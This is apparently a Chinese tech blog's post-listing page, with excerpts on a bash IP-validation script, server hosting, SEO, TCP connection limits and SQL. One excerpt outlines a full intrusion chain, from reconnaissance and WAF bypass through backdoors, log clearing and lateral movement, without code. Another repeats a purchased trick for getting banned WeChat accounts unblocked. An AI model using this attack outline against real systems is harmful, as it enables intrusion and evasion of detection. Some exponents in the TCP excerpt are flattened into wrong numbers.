$FIELD4 -le 255 ]; then             echo "$IP available."         else             echo "$IP not available!"         fi     else         echo "Format error!"     fi } check_ip 192.168.1.1 check_ip 256.1.1.1 增加版: 加个死循环,如果IP可用就退出,不可用提示继续输入,并使用awk判断。 #!/bin/bashfunction check_ip(){     local IP=$1     VALID_CHECK=$(echo $IP|awk -F. '$1< =255&&$2<=255&&$3<=255&&$4<=255{print "yes"}')     if echo $IP|grep -E "^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$" >/dev/null; then         if [ $VALID_CHECK == "yes" ]; then             return 0         else             echo "$IP not available!"             return 1         fi     else         echo "Format error! Please input again."         return 1     fi } while true; do     read -p "Please enter IP: " IP     check_ip $IP     [ $? -eq 0 ] && break || continuedone 一如既往的学习,一如既往的整理,一如即往的分享。感谢支持 ...

    2021-04-17 710
  • 香港服务器与美国服务器的区别

    在租用海外服务器当中,不少用户会选择香港服务器或者美国服务器,这两者有什么区别,分别适合哪些网站。接下来做个简单的分析,希望对大家的选择有所帮助。     一、美国服务器和香港服务器的共同点    美国服务器和香港服务器都可以免备案,都费用低,配置高;言论相对自由,限制很少,稳定性高,具备高防功能。     二、美国服务器和香港服务器的区别     ①香港服务器     香港服务器的地理位置决定了国内访问速度是非常快的,在国内访问香港服务器延迟大概在20-100ms之间,且稳定性好。但香港服务器大多采用的是国际带宽,带宽资源比较小、而且贵。所以现在香港服务器基本都是以3M、5M为主的。如果需要额外增加带宽的话,成本将会高出许多。     香港服务器总体性能配置都是比较高的,对于常见的网站建设都是能够满足。而且售后服务相对之下处理速度会更快些,毕竟没有时差且语言相通。     ②美国服务器     美国地区由于发展多年不仅有用丰富的网络带宽资源,百兆独享带宽往往才数百块,IP资源也是非常丰富。另外因为美国地区服务器软硬件技术发展多年,达到饱和阶段,所以相对性价比非常高 。 美国服务器提供商能够为用户提供众多的独立IP,独立IP对于网站的运营与优化都是非常有利的。     而且美国服务器的稳定性是相当高的,机房一般都具有严格的制度,毕竟美国是全球互联网的发源地,软硬件技术已经达到世界顶点水平,机房的配备完善,服务器工作人员专业性高,大多数的美国服务器提供商都保证99.9%在线率。但是相对于香港服务器,国内访问就会慢很多,在国内访问美国服务器延迟就会达到150-180ms之间!     用户如果想租用防御高、抗攻击、抗DDoS攻击类服务器的话,虽然香港服务器也有高防,但不妨试试美国硬防服务器,这类攻击都是需要足够的资源作为支撑来防御的。     三、美国服务器和香港服务器哪个好    如果你的用户群体是国内地区的话,当然是香港服务器快了,香港离内陆比较近,有先天的地理优势,国内地区的人群访问网站速度会比较快,国外的人群就相对较慢一些。如果你的用户群体是国外地区的话,美国服务器比香港服务器快,美国服务器在全球范围内访问都比较快,在欧美速度更快。如果你的网站或服务器经常被攻击(DDOS)还是建议拿美国服务器好些,美国的机房有充足的硬件支持抵抗攻击,而香港的没有,香港服务器被攻击多次会被回收。 ...

    2021-04-06 708
  • 某宝卖的微信号解封教程

    某宝买的教程解决办法: 微信被封永久禁和其它时长解决办法: 如果绑定了QQ号,可以去冻结账户,修改QQ密码24小时候申请解冻,会有意想不到的效果。 微信号被封禁60天的解决方法:如果绑定了QQ号,可以去冻结账户6~8小时再解冻,就变成了3天。 微信号被封30天的解决方法:先登录账号进入安全中心,下一步将账号解冻5小时后再解冻,登陆微信查看是否变成3天。 ...

    2021-04-06 809
  • m1款mbp读写ntfs硬盘

    想要拷贝给一个同事的ntfs硬盘里文件,插到拓展坞上发现无法读写 找了一圈方法,发现相关的程序都不支持arm框架的cpu 还好最后找到了不用安装软件的方法 首先我们打开 启动台-其他-终端 然后我们输入下面的代码然后按回车运行 sudo nano /etc/fstab 这里要输一下电脑的密码(密码是不显示的),之后还是回车运行 然后就会进入一个文档页面 我们输入 LABEL=你的硬盘名字 none ntfs rw,auto,nobrowse 然后按 control + x 屏幕上提示你以后,按 y 确认来保存 这时候我们拔掉u盘再插上,发现访达里不显示这个u盘了 我们打开访达,点这个“前往文件夹” 输入以下内容并按回车 输入/Volumes/ 这时候就惊喜的看到刚才消失的u盘就出来啦!并且可以正常读写了 ...

    2021-04-06 572
  • 百度蜘蛛爬取网站的频率低,怎么引导蜘蛛?

    1、网站结构实现良好的树状结构;网站链接实现静态化;网站内容资源丰富。一定要先搭建好网站所需的架构,利于蜘蛛的爬行,蜘蛛不像人一样会思考,会转弯,所以需要指引。 2、保证网站更新频率。不要一天打鱼三天晒网,我们人喜欢新鲜的事物,蜘蛛也是一样的。就像小孩一样,每天给他糖吃,他自然就会跟着你,久而久之,他还会自动找上你呢。 3、保证有明确的关键词。百度蜘蛛就是通过关键词进来的,如果你网站没有明确的关键词的话,蜘蛛就会茫然了,那你网站的排名肯定会上不去。最好在标题里2-3个关键词,不要太多;而内页的关键词不要和标题的一样,这会更容易让蜘蛛把内页判断出来,并给于内页一定的权重。 4、保证网站高质量的原创。蜘蛛一天爬行那么多的地方,如果你的内容是采集来的,那对蜘蛛来说就没有什么意义了.不仅不能吸引蜘蛛的到来,也不能吸引用户的光临。蜘蛛的来访是有规律的。如果你每天有更新,它就每天来;一个月有更新,它就一个月来,所以说百度抓取取决于蜘蛛来访。 5、友情链接一定要做好,一个新站想要快速的站稳脚跟快速被收录,很大一部分是需要友情链接的,而且是优质的友情链接,找友情链接的标准一定要是按时更新内容、百度收录数量正常、站内友链不多、内容质量高、权重不低于自己的网站做友链,还要记住按时去检查友链。 6、定期将网站链接放到Sitemap中,然后将Sitemap提交给百度。百度会周期性的抓取检查您提交的Sitemap,对其中的链接进行处理,但收录速度慢于主动推送。 7、主动推送能够更快速的让百度发现你的网站并且收录,这也是最快速的提交方式,将站点当天新产出链接立即通过此方式推送给百度,以保证新链接可以及时被百度收录。 ...

    2021-04-06 574
  • 如何无需插件给emlog文章插入视频

    emlog自带的富文本编辑框是没有插入视频功能的,只有一个插入flash,在一些视频网站可能会有生成flash代码,直接插入链接就行了,但是怎么插入MP4呢?下面给大家带来教程。 一:文章编辑,点击倒数第二个按钮,html代码。 二:复制下面的代码,在合适的位置添加,样式自己看着调吧,然后再点击上面的按钮切回富文本编辑页面,就能看到效果了。 <video src="视频地址" controls="controls" width="100%"></video>...

    2021-04-06 658
  • 听说一台主机只能保持最多65535个TCP连接,是真的吗?

    答案是否定的。 如果计算机不受CPU、内存资源的硬件限制: 计算机为服务器(1),被动接受的连接数可以为232 * 216 * 216 = 264 (理论最大值) 计算机为客户端(2),主动发起的连接数可以为232 * 216 * 216 = 264(理论最大值)  上文的1、2的数字是怎么来的呢?让我们一起分析一下。 计算机为服务器的场景知乎服务器主机在103.41.167.234侦听443端口,等待着来自于任何IP地址的主机访问它,包括它自己。另外任何主机,可以使用任何端口来连接知乎的服务器,对吗? 全球有多少个IP地址呢?232一个主机对应一个IP地址,一个IP地址可以拥有多少个端口号?216两者相乘的结果,就是248 。 但是不要忘记知乎服务器还可以监听1、2、3 。。。444、445、446 。。。65535端口号,代表216服务,与248 相乘,正好得到264 。 计算机为客户端的场景其实和服务器没有任何区别。假设这个客户端的IP = 1.1.1.1,它可以使用特定的端口号10000来主动连接任何IP(232)服务器的任何端口(216),那么就可以建立264个连接。不要忘记客户端还可以使用非10000端口来连接以上服务器,客户端一共216端口,与264相乘,正好也得到264。 以上仅仅是理论,计算机的软硬件资源不可能无限使用。现实实现中操作系统对客户端的连接数有一个默认上限值,即65535。 客户端怎么限制的呢?默认情况下,一个端口号任何时间只能由一个TCP连接使用。客户端1.1.1.1 ,使用端口号10000与知乎服务器103.41.167.234的443端口连接。只要这个连接没有释放,端口号10000就不能用于其它任何连接。这意味着,客户端最大的端口数 = 最多TCP连接数。 潜规则可以使用PORT_REUSE来打破。只要连接TCP连接时,使用该选项,可以不受上文的限制。10000这个端口可以同时用于多个连接,而不仅仅局限于一个连接。 即使客户端有限制,服务器(一个IP)理论上依然可以维持248个连接数。但是那么庞大的连接数会让服务器慢地无法使用。为了让服务器能够给全球用户提供更优质的服务响应,可以使用服务器集群,负载均衡设备提供负载均衡,每个服务器维持几千个TCP连接数。 读者会发现,服务器负载得到了减轻,但是负载均衡设备本身却成为了新的瓶颈,因为用户流量都需要它来导流,如何解决这个问题? 域名解析可以将域名解析为多个负载均衡设备的IP,以此来提供负载均衡设备的负载均衡。...

    2021-04-06 577
  • 反入侵体系建设入门-攻击场景梳理

    0x00 信息收集 1.目标确认 1.1 域名注册信息 目标所有者信息 获取真实IP 验证是否存在CDN 绕过CDN查找网站真实IP 1.2 DNS信息查询 目的: 注册者名称及邮箱,再反查其他域名 手机号 座机号 ASN号 地址在线DNS信息查询工具 1.3 测试域传送漏洞 域传送是一种DNS事务,用于在主从服务器间复制DNS记录。虽然如今已经很少见主机会开启,但是还是应该确认一下。一旦存在域传送漏洞,就意味着你获取了整个域下面所有的记录。 1.4 业务相关 github泄露: 网盘泄露: 各种云网盘 敏感路径扫描: 2.OSINT 公开情报收集 2.1 社工技巧 查看注册的网站: 可以从这些方面判断用户是否注册过 知道QQ 知道手机号 留意社交动态 2.2 搜索引擎OSINT Google Hacking(baidu\bing\souhu\github) 2.3 浏览器实用插件: Wappalyzer:识别网站使用的中间件及其版本,再去漏洞库和搜索引擎找公开披露的漏洞 SwitchOmega:快捷切换代理 shodan:识别开放端口,主机服务等(被动信息搜集) hacktools:综合插件,很强大 firefox渗透便携版version48,工具集成很多 注意:根据获得服务、中间件信息、编辑器版本、数据库等OSINT去各大漏洞库、搜索引擎找漏洞利用 2.4 乌云和cnvd 乌云库\乌云镜像\GHDB\CNVD等公开漏洞库 0x01 主动探测 从管理员和用户的角度了解整个WEB应用乃至整个目标的全貌,主动探测会暴露ip以及留下日志信息,所以要... 1.主动扫描 1.1 常见服务漏洞 nmap的功能: 脚本扫描,隐蔽扫描,端口扫描,服务识别,OS识别,探测WAF 1.3 WAF及bypass 探测WAF bypass 1.4 目录、后台和敏感路径文件扫描 御剑目录、后台扫描 2.人工浏览\逐个请求burp 非常重要,有必要手动去浏览每个页面,点击页面上每一个跳转,这样在Burp的sitemap里面就可以出现这些请求和响应。 图片后台地址\图片后面的信息 跳转参数\奇怪的参数 泄露邮箱等社工信息 业务逻辑\架构 3.自动化 自动化渗透测试框架:(待补充) Sn1per Ary 0x02 漏洞挖掘 1.漏洞扫描工具 注意:登录类网站扫描要带cookies扫才能扫到 1.1 Nikto Web服务漏洞扫描器 1.2 AWVS漏扫 1.3 NESSUS 1.4 Xray自动化的漏洞挖掘 1.5 Fuzz 2.挖掘漏洞 2.1 SQL注入: 2.2 XSS: 2.3 文件上传 2.4 命令执行 2.5 弱口令及字典破解 后台弱口令爆破撞库 2.6 逻辑漏洞 0x03 漏洞利用 对应0x02的挖掘漏洞,进行对应的利用。 0x04 提升权限 提升权限不一定需要,根据任务目标决定。 1.1 内核漏洞 1.2 root权限运行的漏洞软件 1.3 弱密码/重用密码 1.4 suid配置错误 1.5 滥用sudo 1.6 Cronjobs 1.6 敏感文件 0x05 达成目标 1.1 重要文件窃取 1.2 数据库数据窃取、修改 0x06 权限维持 1.1 web后门 1.2 SSH后门 1.3 Cronjobs 1.4 SSH公钥 1.5 SUID=0用户 1.6 木马文件 0x07 防御对抗 1.1 日志清除 1.2 防护软件对抗(卸载) 1.3 进程注入 1.4 进程隐藏 0x08 横向移动 1.1 信息收集 1.2 隧道搭建 1.3 内网扫描 1.4 漏洞扫描 返回到主动探测的步骤,再来一遍。 写在结尾 很多攻击手法不能一一列举,之后会单独分模块展开叙述,如有技术问题交流,可以加入交流群。 ...

    2021-04-06 714
  • SQL 语句中 where 条件后 写上 1=1 是什么意思!

    程序员在编程过程中,经常会在代码中使用到“where 1=1”,这是为什么呢? 这段代码应该是由程序(例如Java)中生成的,where条件中 1=1 之后的条件是通过 if 块动态变化的。 例如 String sql="select * from table_name  where 1=1"; if( conditon 1) {   sql=sql+"  and  var2=value2"; } if(conditon 2) {   sql=sql+"  and var3=value3"; } where 1=1 是为了避免where 关键字后面的第一个词直接就是 “and”而导致语法错误。 动态SQL中连接AND条件 where 1=1 是为了避免where 关键字后面的第一个词直接就是 “and”而导致语法错误。 where后面总要有语句,加上了1=1后就可以保证语法不会出错! select * from table where 1=1 因为table中根本就没有名称为1的字段,所以该SQL等效于select * from table, 这个SQL语句很明显是全表扫描,需要大量的IO操作,数据量越大越慢, 建议查询时增加必输项,即where 1=1后面追加一些常用的必选条件,并且将这些必选条件建立适当的索引,效率会大大提高 拷贝表 create table  table_name   as   select   *   from   Source_table   where   1=1; 复制表结构 create table  table_name   as   select   *   from   Source_table   where   1 <> 1; 所以在查询时,where1=1的后面需要增加其它条件,并且给这些条件建立适当的索引,效率就会大大提高。...

    2021-04-06 803
  • 常见端口漏洞利用总结

    ...

    2021-04-06 825

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:9:00-23:00,节假日休息

扫码关注